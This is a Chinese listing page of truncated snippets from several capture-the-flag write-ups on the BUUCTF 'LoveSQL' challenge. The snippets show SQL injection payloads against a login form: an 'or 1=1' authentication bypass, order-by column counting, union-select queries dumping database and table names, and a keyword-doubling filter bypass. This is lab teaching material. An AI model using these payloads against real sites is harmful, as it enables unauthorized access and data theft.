首页 > TAG信息列表 > LoveSQL
【BUUCTF】[极客大挑战 2019]LoveSQL
1、打开靶机,先尝试一下万能密码 1 admin'or 1=1# 2 1234 2、尝试爆字段 1 admin'order by 1# 2 admin'order by 2# 3 admin'order by 3# 4 admin'order by 4# 3、看回显位置 1 1' union select 1,2,3# 回显在二、三位置 4、爆数据库 1 1' union select 1,database(),ve2019 lovesql 终于有能力做出这道题了
现在来说,更喜欢sql题[极客大挑战 2019]LoveSQL
目录[极客大挑战 2019]LoveSQL首先简单测试一下题目0x000x010x020x030x040x050x06 [极客大挑战 2019]LoveSQL 首先简单测试一下题目 0x00 题目还是熟悉的登陆界面,先尝试一下万能密码的登陆 显示登陆成功,但是flag貌似不对 看起来像是MD5的加密,但是却无法解密 0x01 查询字段 admin'buuctf-web-lovesql
打开靶场,访问题目: 万能密码尝试登录 ,得到了用户名和密码 尝试密码md5解密失败,还是回到注入的思路上 先在username处测试一下有没有注入点:这个题目username和password两个地方都可以作为注入点 ?username=1' order by 1%23&password=ads 没有报错,只是说账号密码错误[极客大挑战 2019]LoveSQL
打开链接,出现登录框 首先用sql万能密码登录 使用MD5无法解密 测试注入点 判断注入点类型 password=e8671c7fcf1a0e6e8b0a14b267de947e 构造username,判断为字符型注入admin' and '1'='1成功登录 admin' and '1'='2登陆失败 判断列数 admin' order by 3 #[极客大挑战 2019]LoveSQL
admin'#登录爆出admin用户密码,MD5解密无果。 常规方法一顿撸。 admin' order by 4# 报错,字段数为3。 -1' union select 1,2,3# 报出显示位。 -1' union select 1,database(),3# 报出数据库名。 -1' union select 1,(select group_concat(table_name) from information_schema.tabl[极客大挑战 2019]LoveSQL
一看标题 就感觉 这题是sql注入 怀疑 会有waf 没 waf 我直接sqlmap 跑出来 上次那位万能密码 师傅出的题 可怕 可能很简单 容易想复杂 大佬应该已经想到 后台查询语句是什么了 我还有点懵 试了下原来的万能秘密 啊这 。。。。。。。。。 一时BUUCTF-[极客大挑战 2019]LoveSQL 1详解
做完了baby sql来到了love sql发现这个注入相比baby sql容易的多 我们还是像baby sql中注入方式一样 于是构造pyload: ?username=admin&password=admin' union select 1,2,3%23 两个回显位 于是就爆数据表:?username=admin&password=admin' uunionnion sselectelect 1,2,gro